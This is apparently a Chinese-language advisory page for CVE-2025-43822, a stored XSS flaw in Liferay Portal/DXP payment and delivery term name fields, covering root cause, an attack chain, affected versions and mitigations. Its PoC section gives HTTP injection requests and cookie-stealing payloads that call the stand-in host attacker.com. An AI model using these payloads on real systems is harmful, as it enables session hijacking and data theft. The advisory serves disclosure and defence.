CVE-2025-43822：Liferay Portal与DXP存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-43822

漏洞类型

存储型跨站脚本（Stored XSS）

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

需要交互 (UI:R)

影响产品

Liferay Portal 和 Liferay DXP

漏洞概述

CVE-2025-43822是存在于Liferay Portal和Liferay DXP中的多个存储型跨站脚本（Stored XSS）漏洞。该漏洞的CVSS评分为5.4，属于中危级别。攻击者可以通过在条款与条件（Terms and Conditions）的名称（Name）文本字段中注入精心构造的恶意载荷来实现任意Web脚本或HTML代码的注入。具体而言，受影响的字段包括：（1）付款条款（Payment Terms）；（2）查看订单页面上的交货条款（Delivery Term）。这些字段对用户输入缺乏充分的过滤和转义处理，导致恶意脚本被持久化存储在服务器端。当其他用户访问包含这些恶意数据的页面时，嵌入的脚本将在受害者浏览器中自动执行。由于漏洞需要低权限认证和用户交互才能触发，攻击者需要先获取一定的系统访问权限（如普通用户账号），然后通过提交包含恶意脚本的条款名称来实施攻击。成功利用此漏洞可能导致会话劫持、敏感信息窃取、钓鱼攻击或其他恶意行为，对系统的机密性和完整性造成损害。Liferay作为广泛使用的企业级门户平台，该漏洞可能影响大量部署了该产品的企业用户。

技术细节

该漏洞的根因在于Liferay Portal和DXP在处理条款与条件（Terms and Conditions）相关数据时，未对用户输入的名称字段进行充分的HTML实体编码或过滤。具体技术原理如下：

1. **输入点**：系统提供了两个主要的输入点——付款条款（Payment Terms）和交货条款（Delivery Term）的名称文本字段。这些字段接受用户输入的文本内容，用于标识不同的商业条款。

2. **存储机制**：用户提交的条款名称数据未经适当转义即被存储到数据库中。攻击者可以提交包含恶意JavaScript代码或HTML标签的字符串作为条款名称，例如`<script>alert(document.cookie)</script>`或`<img src=x onerror=...>`。

3. **输出渲染**：当其他用户访问查看订单页面（view order page）时，系统从数据库中读取存储的条款名称数据，并将其直接渲染到HTML页面中。由于缺少上下文敏感的输出编码，浏览器将恶意脚本解释为可执行代码而非纯文本。

4. **触发条件**：攻击需要低权限用户（PR:L）提交恶意数据，同时需要受害者用户交互（UI:R）访问受影响的页面才能触发脚本执行。这使得漏洞利用需要社会工程学的配合。

5. **影响范围**：由于是存储型XSS，恶意脚本会在每个访问受影响页面的用户浏览器中执行，可能窃取会话Cookie、CSRF令牌，或执行未授权的操作。

CVSS向量表明该漏洞通过网络利用（AV:N），攻击复杂度低（AC:L），需要低权限（PR:L），需要用户交互（UI:R），作用域发生变化（S:C），对机密性和完整性有低影响，对可用性无影响。

攻击链分析

STEP 1

步骤1：获取低权限账号

攻击者通过钓鱼、购买或注册等方式获取Liferay Portal/DXP系统的低权限用户账号，该账号具备创建或编辑条款与条件（Terms and Conditions）的权限。

STEP 2

步骤2：注入恶意载荷

攻击者登录系统后，导航到付款条款（Payment Terms）或交货条款（Delivery Term）管理页面，在名称（Name）文本字段中输入包含恶意JavaScript代码的载荷，如<script>alert(document.cookie)</script>或其他HTML/JS代码。

STEP 3

步骤3：恶意数据持久化存储

提交表单后，包含恶意脚本的条款名称未经充分过滤即被存储到后端数据库中，成为持久化的恶意数据。

STEP 4

步骤4：诱骗受害者访问

攻击者通过社会工程学手段（如发送包含订单链接的邮件或消息）诱骗具有更高权限的用户访问包含恶意条款数据的订单查看页面。

STEP 5

步骤5：恶意脚本执行

当受害者加载订单查看页面时，服务器从数据库读取并渲染条款名称，浏览器将恶意脚本解释为可执行代码，在受害者会话上下文中自动执行。

STEP 6

步骤6：数据窃取与权限提升

恶意脚本可以窃取受害者的会话Cookie、CSRF令牌或其他敏感信息，攻击者利用这些信息冒充受害者执行未授权操作，可能导致权限提升或数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-43822 PoC: Stored XSS in Liferay Portal/DXP Terms and Conditions -->
<!-- Vulnerability: Payment Terms and Delivery Term Name fields -->

<!-- Step 1: Authenticate as a low-privilege user -->
POST /c/portal/login HTTP/1.1
Host: target-liferay-instance.com
Content-Type: application/x-www-form-urlencoded

login=<username>&password=<password>&_com_liferay_portal_security_auth_http_portal_LoginPortlet_redirect=%2F

<!-- Step 2: Inject malicious payload into Payment Terms Name field -->
POST /group/control_panel/manage HTTP/1.1
Host: target-liferay-instance.com
Content-Type: application/x-www-form-urlencoded
Cookie: JSESSIONID=<session_cookie>

_com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet_formDate=1234567890000
&_com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet_name=<script>alert('XSS-'+document.cookie)</script>
&_com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet_type=payment-terms
&_com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet_active=true
&p_p_id=com_liferay_commerce_frontend_internal_portlet_CommerceTermsPortlet

<!-- Alternative payload for Delivery Term on view order page -->
<!-- Payload: <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)"> -->
<!-- Payload: <svg onload="document.location='https://attacker.com/?cookie='+document.cookie"> -->

<!-- Step 3: When victim visits view order page, the stored XSS executes -->
GET /web/guest/order/12345 HTTP/1.1
Host: target-liferay-instance.com
Cookie: JSESSIONID=<victim_session_cookie>

<!-- The malicious script in the Terms name will execute in the victim's browser context -->

影响范围

Liferay Portal 7.4.3.15 - 7.4.3.111

Liferay DXP 2023.Q4.0 - 2023.Q4.5

Liferay DXP 2023.Q3.1 - 2023.Q3.8

Liferay DXP 7.4 update 15 - update 92

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）对条款与条件管理功能实施严格的访问控制，限制只有可信管理员才能创建和编辑条款；2）在Web应用防火墙（WAF）中部署XSS防护规则，拦截常见的恶意脚本载荷；3）配置内容安全策略（CSP）头，限制内联脚本执行；4）对现有数据库中存储的条款名称进行审计，清理可能存在的恶意内容；5）监控异常的用户行为和可疑的脚本执行活动；6）建议用户访问订单页面时保持警惕，避免点击可疑链接。